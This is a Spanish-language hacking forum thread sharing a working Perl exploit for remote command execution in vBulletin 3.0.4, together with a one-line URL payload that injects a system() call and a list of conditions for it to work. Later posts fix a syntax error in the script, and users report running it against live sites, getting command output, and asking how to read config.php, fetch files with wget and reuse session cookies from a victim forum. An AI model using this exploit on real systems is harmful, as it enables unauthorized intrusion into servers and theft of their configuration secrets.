Tema destacado: Nueva página de elhacker.net en Google+ 
Autor
|
Tema: Vbulletin 3.0.4 remote command execution Exploit (Leído 1,929 veces)
|
|
Rojodos
|
Escrito en Perl, aunque se tienen que dar bastantes condiciones para que funcione, tanto este como el original. Ahi va el original en PHP: http://www.k-otik.com/exploits/20050215.vbulletin3.php************************************** #!/usr/bin/perl # vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net> # # Requirement: # showforumusers ON # # # bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net> # # usage : # vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command> # # example : # vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la" # # !! Happy Chinese new Year !!
use IO::Socket;
sub parse_url { local($url) = @_;
if ($url =~ m#^(\w+):#) { $protocol = $1; $protocol =~ tr/A-Z/a-z/; } else { return undef; }
if ($protocol eq "http") { if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) { $server = $1; $server =~ tr/A-Z/a-z/; $port = ($2 ne "" ? $2 : $http_port); $path = ( $3 ? $3 : '/'); return ($protocol, $server, $port, $path); } return undef; } }
sub urlencode{ my($esc) = @_; $esc =~ s/^\s+|\s+$//gs; $esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg; $esc =~ s/ /\+/g; $esc =~ s/%20/\+/g; return $esc; }
$url = $ARGV[0]; $fid = $ARGV[1]; $cmd = urlencode($ARGV[2]);
$http_port = 80;
$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${exit()}}";
@target = parse_url($url);
$conn = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $target[1], PeerPort => $target[2], ) or die "\nUnable to connect\n"; $conn -> autoflush(1); print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n"; while (<$conn>){ print $_; } close $conn; ************************************************
|
|
|
|
|
|
|
|
|
EL_ZoRRo
|
Aqui les adjunto el primer exploit que salio y las condiciones de las que habla rojodos. Exploit: ---------------- http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
Conditions: ---------------- 1st condition : $vboptions['showforumusers'] == True , the admin must set showforumusers ON in vbulletin options.
2nd condition : $bbuserinfo['userid'] == 0 , you must be an visitor/guest.
3rd condition : $DB_site->fetch_array($forumusers) == True , when you visit the forums, it must has at least one user show the forum.
4th condition : magic_quotes_gpc must be OFF
SPECIAL condition : you must bypass unset($GLOBALS["$_arrykey"]) code in init.php by secret array GLOBALS[]=1 ;))) Puedo decir que lo probe y funciona. Salu2
|
|
|
|
|
|
|
|
|
|
viruss1362
|
a mi me da error namas probarlo
erl lo.pl "use" not allowed in expression at lo.pl line 33, at end of line syntax error at lo.pl line 33, near "use IO: ocket" Invalid [] range "_-." in regex; marked by <-- HERE in m/([^a-zA-Z0-9_-. <-- HERE ])/
|
|
|
|
|
|
Más vale parecer un idiota con la boca cerrada, que abrir la boca y demostrar que lo eres www.equipome.com
|
|
|
NokeR
Ubuntu User
|
$esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg; esa es la linea que da el fallo, y se le ha de borrar un _ para que quede: $esc =~ s/([^a-zA-Z0-9-.])/uc sprintf("%%%02x",ord($1))/eg;
Pero mi pregunta es, # usage : # vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command> la forma de usarlo seria: vbulletin30-xp.pl http://web.com/forumdisplay.php 22 id por ejemplo, no? pues he probado con varias, y me responde dandome el codigo HTML de la web, porque? ??? Un saludo
|
|
|
|
|
|
|
|
|
EL_ZoRRo
|
example : # vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la" #[
Ahi esta el ejemplo, el id es un nuemero que se le asigna a cada subforo, fijate que varia de subforo a subforo, bueno es lo mismo cualquier id el tema que tienes que poner una que realmente exista. Es mas simple ejecutar mediante el navegador el (remote command exec), va a mi en realida siempre me gusta realizarlo mediante el navegador asi sea un fallo SQL, RFI etc a no ser que el scrip me briende por ejemplo un proxy para no logear en el server Salu2 .
|
|
|
|
« Última modificación: 19 Febrero 2005, 10:44 por EL_ZoRRo »
|
|
|
|
|
NokeR
Ubuntu User
|
ya eso, es con el xploit de sql, mediante navegador, pero el de perl porque al ejecutarle me responde con el codigo HTML ? :S
|
|
|
|
|
|
|
|
|
EL_ZoRRo
|
Te estas confundiendo no viste el exploit que postee mas arriba
Salu2
|
|
|
|
|
|
|
|
|
NokeR
Ubuntu User
|
Salu2
si lo vi, pero el que tu posteastes no se como se usa...., en cambio el de perl, ya he conseguido hacerlo usar, metiendole un uno donde te pide <forum id> que donde sta esa id?, he conseguido que me aparezca mi id de usuario, osea nobody o apache, entonces yo pregunto, cuando ya ma salido la id de usuario que tengo yo, porque no me deja catear el config.php o hacerle un tail ?
|
|
|
|
|
|
|
|
|
NokeR
Ubuntu User
|
Salu2
si lo vi, pero el que tu posteastes no se como se usa...., en cambio el de perl, ya he conseguido hacerlo usar, metiendole un uno donde te pide <forum id> que donde sta esa id?, he conseguido que me aparezca mi id de usuario, osea nobody o apache, entonces yo pregunto, cuando ya ma salido la id de usuario que tengo yo, porque no me deja catear el config.php o hacerle un tail ? Esque al ejecutarlo, me aparece: C:\>vb.pl http://www.web.com/foro/forumdisplay.php 1 ls HTTP/1.1 200 OK Date: Sat, 19 Feb 2005 02:21:34 GMT Server: Apache/2.0.40 (Red Hat Linux) Accept-Ranges: bytes X-Powered-By: PHP/4.2.2 Set-Cookie: bblastvisit=1108779694; expires=Sun, 19-Feb-06 02:21:34 GMT; path=/ Set-Cookie: bblastactivity=1108779586; expires=Sun, 19-Feb-06 02:21:34 GMT; path =/ Cache-Control: private Content-Length: 0 Connection: close Content-Type: text/html; charset=ISO-8859-1 y nada mas, en cambio si hago un id, abajo de todo eso, me dice la ID
|
|
|
|
|
|
|
|
|
EL_ZoRRo
|
Es muy simple tienes que copiar el code en tui navegador eso si siuempre en el paht que este el foro
Pero mira no andes ejecutando scripts y luego te encuentras en el server y no sabes que hacer , primero el usuario www o apache o nobody es un usuario que posse muy bajos pribilegios ni sueñes poder modificar el index de una pag. Hasta te digo que solo puedes ejecutar cosas en /tmp y en /var/tmp Asi que usa tu imaginacion para saber que puedes hacer
Salu2
|
|
|
|
|
|
|
|
|
NokeR
Ubuntu User
|
ske he probado tu exploit, y no se me tira, en cambio el exploit hecho en Perl me funciona mejor, y lo que yo te digo, esque al ejecutar el comando: "id" me sale mi id, pero si ejecuto otros comandos me aparece el numero: "0".
Porque?
Saludos
|
|
|
|
|
|
|
|
|
|
viruss1362
|
a mi segun el foro k ponga me sale un codigo html o se ejecuta el comando pero los comandos k me van son pocos.. el uname -a, en algun server el ls o poca cosa mas.. el wget no me sube na...
|
|
|
|
|
|
Más vale parecer un idiota con la boca cerrada, que abrir la boca y demostrar que lo eres www.equipome.com
|
|
|
Gamb88
Green Day Maniac
|
ok!! me sale esto HTTP/1.1 200 OK Date: Sat, 19 Feb 2005 16:30:16 GMT Server: Apache/2.0.46 (Red Hat) X-Powered-By: PHP/4.3.2 Expires: 0 Cache-Control: private, post-check=0, pre-check=0, max-age=0 Pragma: no-cache Set-Cookie: bbsessionhash=d9cf615305520be2616923ced3875f4d; path=/ Set-Cookie: bblastvisit=1108830616; expires=Sun, 19-Feb-2006 16:30:16 GMT; path= / Set-Cookie: bblastactivity=1108830616; expires=Sun, 19-Feb-2006 16:30:16 GMT; pa th=/ Content-Type: text/html; charset=ISO-8859-1 Age: 1 Connection: close y la lista de directorios + los php's alojadas en el server.. (foro) cual es el objetivo del exploit? acceder como root?? no le entiendo el chiste. Hice el cookie asi.. Bbsessionhash d9cf615305520be2616923ced3875f4d * bblastvisit 1108830616 expires Sun, 19-Feb-2006 16:30:16 GMT * bblastactivity=1108830616 expires Sun, 19-Feb-2006 16:30:16 GMT y lo guarde como internet@victimaforums.txt (reeemplaze el cookie que me habia debajo la web) o sea el conetenido pero el nombre segui siendo el mismo.. que onda.. Atte. Gamb88
|
|
|
|
« Última modificación: 20 Febrero 2005, 02:35 por Gamb88 »
|
|
I walk this empty street, On the blvd. of broken dreams. Where the city sleeps, And I'm the only one and I walk alone..
|
|
|
Crack_X
Anti-War
Ex-Staff
Peace & Love
|
cual es el objetivo del exploit? acceder como root?? no le entiendo el chiste.
Si lees el titulo dice "remote command execution" , puedes ejecutar comandos remotamente en la maquina.
|
|
|
|
|
|
|
|
|
Gamb88
Green Day Maniac
|
Si lees el titulo dice "remote command execution" , puedes ejecutar comandos remotamente en la maquina.
Entonces estos comandos me dejan hacer cookies remotamente, no?
|
|
|
|
|
|
I walk this empty street, On the blvd. of broken dreams. Where the city sleeps, And I'm the only one and I walk alone..
|
|
|
|
|